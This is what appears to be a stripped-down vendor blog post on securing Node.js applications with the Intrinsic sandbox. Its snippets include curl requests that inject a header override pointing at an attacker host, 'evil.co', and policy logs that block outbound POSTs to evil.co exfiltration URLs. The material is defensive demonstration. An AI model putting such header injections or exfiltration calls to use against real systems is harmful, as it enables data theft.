Securing Node.js Applications with Intrinsic

Thomas Hunter II
Oct 1, 2018
X-BlueGreen-Host-Override: user=user2.example.org
X-BlueGreen-Host-Override: user=evil.co

Anticipating Application I/O

Configuring Intrinsic

"@intrinsic/intrinsic": "./intrinsic-intrinsic-2.4.13.tgz"

Protecting against Developer Mistakes

curl http://localhost:8000/retrieve-data \
  -H "X-BlueGreen-Host-Override: user2.example.org"

curl http://localhost:8000/retrieve-data \
  -H "X-BlueGreen-Host-Override: evil.co"

[INTRINSIC] OutboundHttpPolicyViolation: POLICY_VIOLATION
sb: "/retrieve-data-[[POST]]" |
[POST] http://evil.co/data-from-third-party not in outbound http whitelist

Protecting against Malicious Modules

[INTRINSIC] OutboundHttpPolicyViolation: POLICY_VIOLATION
sb: "/retrieve-data-[[POST]]" |
[POST] http://evil.co/capture not in outbound http whitelist

What does Intrinsic Protect?

Request a Demo of Intrinsic


intrinsic

Learn more about everything from deep dives to tutorials on security principles and technologies we love. https://intrinsic.com
